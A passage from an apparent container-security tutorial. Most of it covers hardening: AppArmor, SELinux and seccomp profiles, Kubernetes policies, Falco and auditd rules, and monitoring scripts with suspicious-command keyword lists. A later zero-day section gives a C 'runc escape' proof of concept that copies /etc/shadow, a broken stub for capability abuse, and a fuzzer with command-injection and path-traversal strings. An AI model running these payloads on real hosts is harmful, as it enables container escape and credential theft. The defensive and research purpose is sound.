  /var/lib/nginx/** rw,
  /usr/share/nginx/** r,
  
  /dev/urandom r,
  /proc/sys/kernel/random/uuid r,
}
EOF

# Load the profile
sudo apparmor_parser -r -W /etc/apparmor.d/docker-nginx

# Run container with the profile
docker run --security-opt apparmor=docker-nginx nginx:latest

SELinux policies for containers:

# Enable SELinux in enforcing mode
setenforce 1

# Run container with SELinux options
docker run --security-opt label=type:container_t nginx:latest

# Allow specific volume mounts
docker run --security-opt label=type:container_t \
  -v /path/to/data:/data:z \
  nginx:latest

6. Seccomp Profiles

# Create a custom seccomp profile
cat > seccomp-nginx.json << 'EOF'
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": [
    "SCMP_ARCH_X86_64",
    "SCMP_ARCH_X86",
    "SCMP_ARCH_X32"
  ],
  "syscalls": [
    {
      "names": [
        "accept",
        "accept4",
        "access",
        "arch_prctl",
        "bind",
        "brk",
        "capget",
        "capset",
        "chdir",
        "chmod",
        "chown",
        "clock_getres",
        "clock_gettime",
        "clone",
        "close",
        "connect",
        "epoll_create",
        "epoll_create1",
        "epoll_ctl",
        "epoll_wait",
        "execve",
        "exit",
        "exit_group",
        "faccessat",
        "fadvise64",
        "fchdir",
        "fchmod",
        "fchown",
        "fcntl",
        "fdatasync",
        "flock",
        "fstat",
        "fstatfs",
        "fsync",
        "ftruncate",
        "futex",
        "getcwd",
        "getdents",
        "getdents64",
        "getegid",
        "geteuid",
        "getgid",
        "getgroups",
        "getpeername",
        "getpid",
        "getppid",
        "getpriority",
        "getrandom",
        "getresgid",
        "getresuid",
        "getrlimit",
        "getrusage",
        "getsockname",
        "getsockopt",
        "gettid",
        "gettimeofday",
        "getuid",
        "ioctl",
        "kill",
        "listen",
        "lseek",
        "lstat",
        "madvise",
        "memfd_create",
        "mkdir",
        "mmap",
        "mprotect",
        "mremap",
        "munmap",
        "nanosleep",
        "newfstatat",
        "open",
        "openat",
        "pipe",
        "pipe2",
        "poll",
        "prctl",
        "pread64",
        "prlimit64",
        "pwrite64",
        "read",
        "readlink",
        "readlinkat",
        "recvfrom",
        "recvmsg",
        "rename",
        "rmdir",
        "rt_sigaction",
        "rt_sigprocmask",
        "rt_sigreturn",
        "rt_sigsuspend",
        "sched_getaffinity",
        "sched_getparam",
        "sched_getscheduler",
        "sched_yield",
        "select",
        "sendfile",
        "sendmmsg",
        "sendmsg",
        "sendto",
        "set_robust_list",
        "set_tid_address",
        "setgid",
        "setgroups",
        "setitimer",
        "setpriority",
        "setresgid",
        "setresuid",
        "setsockopt",
        "setuid",
        "shutdown",
        "sigaltstack",
        "socket",
        "socketpair",
        "stat",
        "statfs",
        "sysinfo",
        "tgkill",
        "time",
        "times",
        "truncate",
        "uname",
        "unlink",
        "utimensat",
        "wait4",
        "waitid",
        "write",
        "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
EOF

# Run container with custom seccomp profile
docker run --security-opt seccomp=seccomp-nginx.json nginx:latest

Kubernetes Security Hardening

1. Pod Security Standards (PSS)

# Example Kubernetes PSP (Pod Security Policy)
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted
spec:
  privileged: false
  allowPrivilegeEscalation: false
  requiredDropCapabilities:
    - ALL
  volumes:
    - 'configMap'
    - 'emptyDir'
    - 'projected'
    - 'secret'
    - 'downwardAPI'
    - 'persistentVolumeClaim'
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    rule: 'MustRunAsNonRoot'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  fsGroup:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  readOnlyRootFilesystem: true

With newer Kubernetes versions, use Pod Security Admission (PSA):

# Namespace with PSA labels
apiVersion: v1
kind: Namespace
metadata:
  name: secure-workloads
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

2. Network Policies

# Default deny-all policy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

# Allow specific traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: api-allow
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: api
  policyTypes:
  - Ingress
  - Egress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: database
    ports:
    - protocol: TCP
      port: 5432

3. RBAC Hardening

# Restrictive Role example
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: production
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list"]

# Binding the role to a service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: production
subjects:
- kind: ServiceAccount
  name: monitoring-sa
  namespace: production
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

4. Admission Controllers

# OPA/Gatekeeper policy example
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: no-privileged-containers
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: ["kube-system"]

Runtime Security Monitoring

1. Run-time Container Security Monitoring with Falco

# Install Falco with Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco

# Custom Falco rule for container escapes
- rule: Container Mount Sensitive Host Path
  desc: Detect attempts to mount sensitive host paths
  condition: >
    container and
    (container.image.repository != "falco" and
     container.image.repository != "sysdig") and
    mount and
    (mount.source startswith "/proc" or
     mount.source startswith "/var/run/docker.sock" or
     mount.source startswith "/etc" or
     mount.source startswith "/root" or
     mount.source startswith "/var/lib/kubelet" or
     mount.source startswith "/var/lib/docker")
  output: >
    Sensitive host path mounted in container (user=%user.name
    command=%proc.cmdline
    container_id=%container.id container_name=%container.name
    image=%container.image.repository source=%mount.source
    destination=%mount.dest)
  priority: WARNING
  tags: [container, runtime]

2. Implement File Integrity Monitoring

# Install AIDE (Advanced Intrusion Detection Environment)
apt-get update && apt-get install -y aide

# Configure AIDE to monitor critical directories
cat > /etc/aide/aide.conf.d/90_docker << 'EOF'
/var/lib/docker/overlay2 R
/usr/bin/docker NORMAL
/usr/bin/containerd NORMAL
/etc/docker NORMAL
/etc/containerd NORMAL
EOF

# Initialize the database
aide --init
mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# Set up a daily check
cat > /etc/cron.daily/aide-check << 'EOF'
#!/bin/sh
aide --check | mail -s "AIDE check report" root
EOF
chmod +x /etc/cron.daily/aide-check

3. Set Up Auditing

# Configure auditd to monitor container-related activities
cat > /etc/audit/rules.d/docker.rules << 'EOF'
# Monitor Docker daemon
-w /usr/bin/dockerd -p rwxa -k docker
-w /usr/bin/docker -p rwxa -k docker
-w /usr/bin/containerd -p rwxa -k docker
-w /usr/bin/crictl -p rwxa -k docker

# Monitor Docker configuration
-w /etc/docker/ -p rwxa -k docker_conf
-w /etc/containerd/ -p rwxa -k docker_conf

# Monitor Docker socket
-w /var/run/docker.sock -p rwxa -k docker_socket

# Monitor Docker containers
-w /var/lib/docker/ -p rwxa -k docker_containers
EOF

# Restart auditd
systemctl restart auditd

# Search audit logs for docker-related events
ausearch -k docker

Auto-Remediation Scripts

1. Detect and Kill Privileged Containers

#!/bin/bash
# security_monitor.sh - Monitor for privileged containers

while true; do
  # Find privileged containers
  echo "[*] Checking for privileged containers..."
  PRIVILEGED_CONTAINERS=$(docker ps -a --format '{{.ID}} {{.Names}}' --filter "label=security_approved!=true" | \
    xargs -I{} sh -c 'docker inspect --format="{{.HostConfig.Privileged}} {}" {} | grep "^true" || true')
  
  if [ ! -z "$PRIVILEGED_CONTAINERS" ]; then
    echo "[!] WARNING: Unauthorized privileged containers detected!"
    echo "$PRIVILEGED_CONTAINERS"
    
    # Notify administrators
    echo "[*] Sending notification..."
    echo "Unauthorized privileged containers detected: $PRIVILEGED_CONTAINERS" | \
      mail -s "SECURITY ALERT: Privileged Containers" admin@example.com
    
    # Stop containers (uncomment to enable auto-remediation)
    # echo "[*] Stopping unauthorized containers..."
    # echo "$PRIVILEGED_CONTAINERS" | awk '{print $2}' | xargs -I{} docker stop {}
  else
    echo "[*] No unauthorized privileged containers found."
  fi
  
  # Check for containers with Docker socket mounted
  echo "[*] Checking for containers with Docker socket mounted..."
  DOCKER_SOCKET_CONTAINERS=$(docker ps -a --format '{{.ID}} {{.Names}}' --filter "label=security_approved!=true" | \
    xargs -I{} sh -c 'docker inspect --format="{{range .Mounts}}{{if eq .Source \"/var/run/docker.sock\"}}VULNERABLE: {{end}}{{end}} {}" {} | grep "^VULNERABLE" || true')
  
  if [ ! -z "$DOCKER_SOCKET_CONTAINERS" ]; then
    echo "[!] WARNING: Unauthorized containers with Docker socket detected!"
    echo "$DOCKER_SOCKET_CONTAINERS"
    
    # Notify administrators
    echo "[*] Sending notification..."
    echo "Unauthorized Docker socket mounts detected: $DOCKER_SOCKET_CONTAINERS" | \
      mail -s "SECURITY ALERT: Docker Socket Mount" admin@example.com
    
    # Stop containers (uncomment to enable auto-remediation)
    # echo "[*] Stopping unauthorized containers..."
    # echo "$DOCKER_SOCKET_CONTAINERS" | awk '{print $2}' | xargs -I{} docker stop {}
  else
    echo "[*] No unauthorized Docker socket mounts found."
  fi
  
  sleep 300  # Run every 5 minutes
done

2. Detect Suspicious Kubectl Operations

#!/bin/bash
# k8s_security_monitor.sh - Monitor for suspicious Kubernetes operations

# Setup kubectl audit logging
mkdir -p /var/log/kubernetes/audit
cat > /etc/kubernetes/audit-policy.yaml << 'EOF'
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
  resources:
  - group: ""
    resources: ["pods/exec", "pods/attach", "secrets", "configmaps"]
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "clusterroles", "rolebindings", "clusterrolebindings"]
  - group: "apps"
    resources: ["deployments", "daemonsets", "statefulsets"]
EOF

# Function to check for suspicious kubectl commands
check_suspicious_commands() {
  # Look for pod exec commands (potential container escapes)
  KUBECTL_EXECS=$(grep "pods/exec" /var/log/kubernetes/audit/audit.log | grep -v "system:" | tail -n 20)
  
  if [ ! -z "$KUBECTL_EXECS" ]; then
    echo "[!] WARNING: Recent kubectl exec commands detected!"
    echo "$KUBECTL_EXECS"
    
    # Check for suspicious commands in exec
    for cmd in "mount" "chroot" "docker" "kubelet" "nsenter" "iptables" "ip link"; do
      SUSPICIOUS=$(echo "$KUBECTL_EXECS" | grep "$cmd")
      if [ ! -z "$SUSPICIOUS" ]; then
        echo "[!] ALERT: Potentially dangerous command '$cmd' executed in container!"
        echo "$SUSPICIOUS" | mail -s "SECURITY ALERT: Suspicious kubectl exec" admin@example.com
      fi
    done
  fi
  
  # Look for privilege escalation via RBAC changes
  RBAC_CHANGES=$(grep -E "roles|clusterroles|rolebindings|clusterrolebindings" /var/log/kubernetes/audit/audit.log | grep -v "system:" | tail -n 20)
  
  if [ ! -z "$RBAC_CHANGES" ]; then
    echo "[!] WARNING: Recent RBAC changes detected!"
    echo "$RBAC_CHANGES"
    echo "$RBAC_CHANGES" | mail -s "SECURITY ALERT: RBAC Changes" admin@example.com
  fi
}

# Run checks periodically
while true; do
  echo "[*] Checking for suspicious Kubernetes operations..."
  check_suspicious_commands
  sleep 600  # Run every 10 minutes
done

Defense in Depth Architecture

A multi-layered approach provides the best protection:

  1. Host Hardening
    • Keep hosts updated
    • Minimize installed packages
    • Use SELinux/AppArmor
    • Enable seccomp
    • Implement host firewalls
  2. Container Isolation Enhancement
    • Use Kata Containers or gVisor
    • Implement strict cgroup limits
    • Never use privileged containers
    • Use read-only filesystems
  3. Network Segmentation
    • Implement network policies
    • Use service meshes for mTLS
    • Segment container networks
    • Apply egress filtering
  4. Access Controls
    • Least privilege RBAC
    • Just-in-time access
    • Separate admin credentials
    • Regular permission audits
  5. Monitoring and Detection
    • Runtime security monitoring
    • Behavioral analysis
    • Centralized logging
    • Alerting and auto-remediation

Vulnerability Management

# Scan container images for vulnerabilities
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy image nginx:latest

# Scan running containers
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy container $(docker ps -q)

# Scan Kubernetes clusters
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/trivy-operator/main/deploy/manifests/trivy-operator.yaml

Hands-On Challenge #10: Defense Lab

Set up a secure container environment with defense in depth:

# Install gVisor
curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/gvisor-archive-keyring.gpg] https://storage.googleapis.com/gvisor/releases release main" | sudo tee /etc/apt/sources.list.d/gvisor.list > /dev/null
sudo apt-get update && sudo apt-get install -y runsc

# Configure Docker to use gVisor
sudo bash -c 'cat > /etc/docker/daemon.json << EOF
{
  "runtimes": {
    "runsc": {
      "path": "/usr/bin/runsc"
    }
  }
}
EOF'

# Restart Docker
sudo systemctl restart docker

# Create a hardened container
docker run --rm -d \
  --runtime=runsc \
  --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m \
  --name secure-nginx \
  -p 8080:80 \
  nginx:latest

# Now try to escape from this container
docker exec -it secure-nginx bash

Research and Zero-Day Development

Now that we've mastered existing escape techniques, let's explore the cutting edge: researching and developing new container escape methods.

The Container Vulnerability Research Process

After spending years on container security research, I've developed this methodology for finding new escape vectors:

  1. Understand the underlying technology deeply: Study the Linux kernel features, container runtime source code, and isolation mechanisms thoroughly.
  2. Map the attack surface: Identify all interfaces between container and host, both intended and unintended.
  3. Follow development closely: Monitor container runtime repositories, mailing lists, and issue trackers.
  4. Test new features aggressively: New features often introduce security issues before they're hardened.
  5. Look for unexpected interactions: Most zero-days come from unexpected interactions between components.

Source Code Auditing Techniques

To find zero-days, we need to dig into source code:

# Clone and analyze Docker source code
git clone https://github.com/moby/moby.git
cd moby

# Search for dangerous patterns in the code
grep -r "unsafe\." --include="*.go" .
grep -r "syscall\." --include="*.go" .
grep -r "exec\.Command" --include="*.go" .

# Look for privileged operations in runtimes
grep -r "privileged" --include="*.go" .
grep -r "CAP_SYS_ADMIN" --include="*.go" .

Focus on code that handles these critical areas:

  1. Namespace transitions: Code that moves between namespaces
  2. Capability management: How capabilities are granted and dropped
  3. Volume mounting: File system interactions between host and container
  4. Network configuration: Especially interfaces shared with the host
  5. cgroup operations: Resource control mechanisms

Finding Hidden Attack Surfaces

Some of the most powerful container escapes come from overlooked attack surfaces:

1. Linux Pseudo-Filesystems

Beyond /proc and /sys, look at these often-overlooked interfaces:

# Check for debugfs access
ls -la /sys/kernel/debug/

# Look for tracefs
ls -la /sys/kernel/tracing/

# Check for securityfs
ls -la /sys/kernel/security/

2. Shared Memory Regions

# List all shared memory segments
ipcs -m

# Check for Docker-specific shared memory
ls -la /dev/shm/

# Look for namespace identifiers that might be shared
ls -la /proc/self/ns/

3. Abstract Unix Sockets

# List all abstract sockets (note the leading @)
netstat -xl | grep "@"

# Check for container runtime sockets
netstat -xl | grep -E "@docker|@containerd|@podman"

4. Extended BPF (eBPF) Subsystem

A promising area for new container escapes:

# Check if BPF JIT compilation is enabled (potential target)
cat /proc/sys/net/core/bpf_jit_enable

# List loaded BPF programs and maps (if bpftool is available)
bpftool prog list
bpftool map list

Developing a Custom runc Escape

Let's build a custom exploit for runc, the low-level container runtime:

// custom_runc_escape.c - Proof of concept for a hypothetical runc vulnerability
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/mount.h>

// This is a simplified demonstration of developing a custom runc escape
// Actual exploits would target specific vulnerabilities

#define RUNC_SOCKET "/run/runc/runc.sock"
#define PAYLOAD "#!/bin/bash\ncp /etc/shadow /tmp/shadow && chmod 777 /tmp/shadow\n"

int main(int argc, char *argv[]) {
    printf("[+] Starting custom runc escape POC\n");
    
    // 1. Check for prerequisites
    if (access(RUNC_SOCKET, F_OK) == -1) {
        printf("[-] runc socket not found at %s\n", RUNC_SOCKET);
        return 1;
    }
    
    // 2. Create a payload file
    FILE *payload_file = fopen("/tmp/payload.sh", "w");
    if (!payload_file) {
        perror("[-] Failed to create payload file");
        return 1;
    }
    fprintf(payload_file, "%s", PAYLOAD);
    fclose(payload_file);
    chmod("/tmp/payload.sh", 0755);
    
    // 3. Connect to runc socket
    struct sockaddr_un addr;
    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("[-] Socket creation failed");
        return 1;
    }
    
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, RUNC_SOCKET, sizeof(addr.sun_path) - 1);
    
    printf("[+] Connecting to runc socket\n");
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        perror("[-] Connection failed");
        return 1;
    }
    
    // 4. Craft exploit payload
    // Note: This is a framework for a real exploit targeting a specific vulnerability
    // Actual exploits would use specific protocol messages/commands
    
    char buffer[4096];
    snprintf(buffer, sizeof(buffer), 
        "{\n"
        "  \"type\": \"exec\",\n"
        "  \"payload\": {\n"
        "    \"command\": [\"/tmp/payload.sh\"],\n"
        "    \"env\": [\"PATH=/bin:/usr/bin\"],\n"
        "    \"tty\": false\n"
        "  }\n"
        "}\n");
    
    printf("[+] Sending payload to runc socket\n");
    if (write(sock, buffer, strlen(buffer)) == -1) {
        perror("[-] Failed to send payload");
        close(sock);
        return 1;
    }
    
    // 5. Check if exploit succeeded
    sleep(1);
    if (access("/tmp/shadow", F_OK) != -1) {
        printf("[+] Exploit successful! Host shadow file copied to /tmp/shadow\n");
    } else {
        printf("[-] Exploit failed or container not vulnerable\n");
    }
    
    close(sock);
    return 0;
}

Discovering New Capabilities-Based Escapes

Capabilities-based escapes are often overlooked:

// cap_abuse.c - Demonstrate a new capabilities-based escape
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main() {
    // Check our current capabilities
    cap_t caps = cap_get_proc();
    if (caps == NULL) {
        perror("Failed to get capabilities");
        return 1;
    }
    
    printf("[+] Current capabilities:\n");
    char *caps_text = cap_to_text(caps, NULL);
    printf("%s\n", caps_text);
    cap_free(caps_text);
    cap_free(caps);
    
    // Look for interesting capabilities
    if (cap_dac_override_check()) {
        printf("[+] Found CAP_DAC_OVERRIDE capability\n");
        printf("[+] Attempting to access host files via side channel...\n");
        
        // In a real exploit, we would use the capability in a novel way
        // This is just a demonstration framework
        
        // Example: Use CAP_DAC_OVERRIDE to bypass permission checks on
        // a special device or interface that has access to host resources
        int fd = open("/dev/custom_interface", O_RDWR);
        if (fd != -1) {
            printf("[+] Successfully opened restricted interface\n");
            // Use the interface to escape
            close(fd);
        }
    }
    
    // Similarly check other capabilities for novel abuse vectors
    
    return 0;
}

// Note: This function is for demonstration only
int cap_dac_override_check() {
    // In a real implementation, use libcap to check for specific capability
    return 1; // Pretend we have it for demonstration
}

Fuzzing Container Runtimes

Fuzzing has discovered numerous container escape vulnerabilities:

#!/usr/bin/env python3
# container_runtime_fuzzer.py - Basic framework for fuzzing container runtimes

import os
import random
import subprocess
import json
import time
import signal
from multiprocessing import Pool

# Configuration
ITERATIONS = 10000
DOCKER_BIN = "/usr/bin/docker"
TEST_IMAGE = "ubuntu:20.04"
OUTPUT_DIR = "./fuzzing_results"

# Fuzzing primitives
SPECIAL_STRINGS = [
    "../../../../../../../../etc/shadow",
    "/dev/random",
    "/proc/self/exe",
    "$(id)",
    "`cat /etc/shadow`",
    "\x00\xFF\x90\x12\x34",
    "\\",
    "%s%s%s%s%s%s%s%s%s%s",
]

MOUNT_TARGETS = [
    "/etc",
    "/proc",
    "/sys",
    "/dev",
    "/var/run",
    "/var/run/docker.sock",
    "/",
]

ENV_VARS = [
    "PATH=/bin:/usr/bin:/sbin:/usr/sbin",
    "TERM=xterm",
    "DISPLAY=:0",
    "HOME=/root",
    "LD_PRELOAD=/lib/evil.so",
    "DOCKER_HOST=unix:///var/run/docker.sock",
]

CAPABILITIES = [
    "ALL",
    "SYS_ADMIN",
    "NET_ADMIN",
    "SYS_PTRACE",
    "SYS_MODULE",
    "DAC_READ_SEARCH",
    "DAC_OVERRIDE",
]

def generate_random_string(length=10):
    """Generate a random string of the specified length."""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+[]{}|;:,.<>?/"
    return ''.join(random.choice(charset) for _ in range(length))

def generate_fuzzy_volume():
    """Generate a random volume configuration."""
    src = random.choice([
        generate_random_string(),
        random.choice(SPECIAL_STRINGS),
        random.choice(MOUNT_TARGETS)
    ])
    
    dst = random.choice([
        generate_random_string(),
        random.choice(SPECIAL_STRINGS),
        "/mnt/fuzz",
        "/etc/passwd"
    ])
    
    mode = random.choice(["ro", "rw", "z", "Z", "shared", "rshared", "slave", "rslave"])
    
    return f"{src}:{dst}:{mode}"

def generate_fuzzy_command():
    """Generate a random command to execute in the container."""
    base_commands = [
        "sleep",
        "cat",
        "ls",
        "echo",
        "touch",
        "mount",
        "umount",
        "id",
        "sh -c",
        "bash -c",
    ]
    
    cmd = random.choice(base_commands)
    
    if random.random() < 0.5:
        cmd += " " + random.choice(SPECIAL_STRINGS)
    else:
        cmd += " " + generate_random_string()
    
    return cmd

def generate_fuzzy_container_config():
    """Generate a random container configuration for fuzzing."""
    config = {
        "Image": TEST_IMAGE,
        "Cmd": generate_fuzzy_command().split(),
        "Hostname": generate_random_string(),
        "Domainname": generate_random_string(),
        "User": random.choice(["root", "1000:1000", "nobody", "daemon", "65534"]),
        "AttachStdin": random.choice([True, False]),
        "AttachStdout": random.choice([True, False]),
        "AttachStderr": random.choice([True, False]),
        "Tty": random.choice([True, False]),
        "OpenStdin": random.choice([True, False]),
        "StdinOnce": random.choice([True, False]),
        "Env": [random.choice(ENV_VARS) for _ in range(random.randint(0, 5))],
        "Volumes": {random.choice(MOUNT_TARGETS): {} for _ in range(random.randint(0, 3))},
        "NetworkDisabled": random.choice([True, False]),
        "HostConfig": {
            "Binds": [generate_fuzzy_volume() for _ in range(random.randint(0, 3))],
            "CapAdd": [random.choice(CAPABILITIES) for _ in range(random.randint(0, 2))],
            "CapDrop": [random.choice(CAPABILITIES) for _ in range(random.randint(0, 2))],
            "Privileged": random.random() < 0.1,  # 10% chance of being privileged
            "ReadonlyRootfs": random.choice([True, False]),
            "IpcMode": random.choice(["", "host", "container:fuzzy", "private"]),
            "PidMode": random.choice(["", "host", "container:fuzzy"]),
            "NetworkMode": random.choice(["default", "bridge", "host", "none"]),
            "UTSMode": random.choice(["", "host"]),
            "Devices": [],  # We could fuzz device mappings too
            "ShmSize": random.choice([0, 64*1024*1024, 128*1024*1024]),
        }
    }
    
    # Sometimes add a custom seccomp profile (careful, can crash the system!)
    if random.random() < 0.05:  # 5% chance
        config["HostConfig"]["SecurityOpt"] = [
            "seccomp=" + json.dumps({
                "defaultAction": random.choice(["SCMP_ACT_ALLOW", "SCMP_ACT_ERRNO", "SCMP_ACT_KILL"]),
                "syscalls": [{"names": ["open", "read", "write"], "action": "SCMP_ACT_ALLOW"}]
            })
        ]
    
    return config

def run_fuzzing_test(iteration):
    """Run a single fuzzing test iteration."""
    try:
        config = generate_fuzzy_container_config()
        
        # Log the test case
        test_case_file = os.path.join(OUTPUT_DIR, f"test_case_{iteration}.json")
        with open(test_case_file, "w") as f:
            json.dump(config, f, indent=2)
        
        # Create the container with our fuzzy config
        container_config_file = os.path.join(OUTPUT_DIR, f"container_config_{iteration}.json")
        with open(container_config_file, "w") as f:
            json.dump(config, f, indent=2)
        
        # Use docker create with our config
        create_cmd = [DOCKER_BIN, "create"]
        
        # Add host config options
        host_config = config["HostConfig"]
        if host_config.get("Binds"):
            for bind in host_config["Binds"]:
                create_cmd.extend(["-v", bind])
        
        if host_config.get("CapAdd"):
            for cap in host_config["CapAdd"]:
                create_cmd.extend(["--cap-add", cap])
        
        if host_config.get("CapDrop"):
            for cap in host_config["CapDrop"]:
                create_cmd.extend(["--cap-drop", cap])
        
        if host_config.get("Privileged"):
            create_cmd.append("--privileged")
        
        if host_config.get("ReadonlyRootfs"):
            create_cmd.append("--read-only")
        
        # Add other config options
        create_cmd.extend(["--hostname", config["Hostname"]])
        for env in config["Env"]:
            create_cmd.extend(["-e", env])
        
        # Add the image and command
        create_cmd.append(config["Image"])
        create_cmd.extend(config["Cmd"])
        
        # Run the command with a timeout
        try:
            create_process = subprocess.Popen(
                create_cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )
            
            # Set a timeout
            def timeout_handler(signum, frame):
                create_process.kill()
                raise TimeoutError("Process timed out")
            
            signal.signal(signal.SIGALRM, timeout_handler)
            signal.alarm(5)  # 5 second timeout
            
            stdout, stderr = create_process.communicate()
            signal.alarm(0)  # Cancel the alarm
            
            container_id = stdout.decode().strip()
            
            # Log the results
            result = {
                "iteration": iteration,
                "container_id": container_id,
                "exit_code": create_process.returncode,
                "stdout": stdout.decode(),
                "stderr": stderr.decode()
            }
            
            result_file = os.path.join(OUTPUT_DIR, f"result_{iteration}.json")
            with open(result_file, "w") as f:
                json.dump(result, f, indent=2)
            
            # Check if we successfully created a container
            if create_process.returncode == 0 and container_id:
                # Start the container (might trigger bugs)
                start_cmd = [DOCKER_BIN, "start", container_id]
                start_process = subprocess.Popen(
                    start_cmd,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE
                )
                
                signal.alarm(5)  # 5 second timeout
                start_stdout, start_stderr = start_process.communicate()
                signal.alarm(0)  # Cancel the alarm
                
                # Log the start results
                start_result = {
                    "iteration": iteration,
                    "container_id": container_id,
                    "exit_code": start_process.returncode,
                    "stdout": start_stdout.decode(),
                    "stderr": start_stderr.decode()
                }
                
                start_result_file = os.path.join(OUTPUT_DIR, f"start_result_{iteration}.json")
                with open(start_result_file, "w") as f:
                    json.dump(start_result, f, indent=2)
                
                # Let it run briefly
                time.sleep(1)
                
                # Clean up the container
                subprocess.run([DOCKER_BIN, "rm", "-f", container_id], 
                              stdout=subprocess.DEVNULL, 
                              stderr=subprocess.DEVNULL)
        
        except TimeoutError:
            # Log timeout
            timeout_result = {
                "iteration": iteration,
                "timeout": True,
                "command": " ".join(create_cmd)
            }
            
            timeout_file = os.path.join(OUTPUT_DIR, f"timeout_{iteration}.json")
            with open(timeout_file, "w") as f:
                json.dump(timeout_result, f, indent=2)
            
            # Try to clean up any container that might have been created
            try:
                containers = subprocess.check_output([DOCKER_BIN, "ps", "-aq"]).decode().strip().split("\n")
                for container in containers:
                    if container:
                        subprocess.run([DOCKER_BIN, "rm", "-f", container], 
                                      stdout=subprocess.DEVNULL, 
                                      stderr=subprocess.DEVNULL)
            except:
                pass
    
    except Exception as e:
        # Log any exceptions
        error_result = {
            "iteration": iteration,
            "error": str(e)
        }
        
        error_file = os.path.join(OUTPUT_DIR, f"error_{iteration}.json")
        with open(error_file, "w") as f:
            json.dump(error_result, f, indent=2)

def main():
    """Main fuzzing function."""
    # Create output directory
    os.makedirs(OUTPUT_DIR, exist_ok=True)
    
    print(f"[+] Starting container runtime fuzzing with {ITERATIONS} iterations")
    print(f"[+] Results will be saved to {OUTPUT_DIR}")
    
    # Run tests in parallel
    with Pool(processes=os.cpu_count()) as pool:
        pool.map(run_fuzzing_test, range(ITERATIONS))
    
    print("[+] Fuzzing complete")
    print("[+] Analyzing results for potential vulnerabilities...")
    
    # Simple result analysis
    crashes = 0
    timeouts = 0
    errors = 0
    
    for filename in os.listdir(OUTPUT_DIR):
        if filename.startswith("error_"):
            errors += 1
        elif filename.startswith("timeout_"):
            timeouts += 1
        elif filename.startswith("result_"):
            with open(os.path.join(OUTPUT_DIR, filename), "r") as f:
                result = json.load(f)
                if result["exit_code"] != 0:
                    crashes += 1
    
    print(f"[+] Analysis complete:")
    print(f"  - Crashes: {crashes}")
    print(f"  - Timeouts: {timeouts}")
    print(f"  - Errors: {errors}")
    print("[+] Check the output directory for detailed logs")

if __name__ == "__main__":
    main()

Developing Zero-Day Exploits Responsibly

When you discover a new container escape vulnerability:

  1. Document thoroughly: Record all steps, affected versions, and prerequisites.
  2. Develop a proof-of-concept: Create a minimal working example.
  3. Contact the vendor: Follow responsible disclosure procedures.
  4. Allow time for patching: Typically 90 days before publication.
  5. Publish details after patch: Share knowledge to improve security.

Research Decision Tree

What area are you researching?
├── Container runtime (Docker, containerd)
│   ├── Focus on → Namespace transitions, capability management
│   └── Methods → Source code auditing, fuzzing API endpoints
├── Linux kernel features used by containers
│   ├── Focus on → cgroups, namespaces, capabilities
│   └── Methods → Code review, syscall fuzzing
├── Orchestration platforms (Kubernetes)
│   ├── Focus on → API server, kubelet, etcd
│   └── Methods → Authentication bypass, permission escalation
└── Container images and build processes
    ├── Focus on → Build systems, base images
    └── Methods → Supply chain attacks, backdooring

Common Pitfalls & Troubleshooting

Even experienced security researchers face challenges with container escapes. Here's how to overcome common issues:

Container Escape Failures

Problem: The escape technique fails despite meeting all prerequisites.

Troubleshooting Steps:

Kernel hardening features:

# Check if kernel hardening is enabled
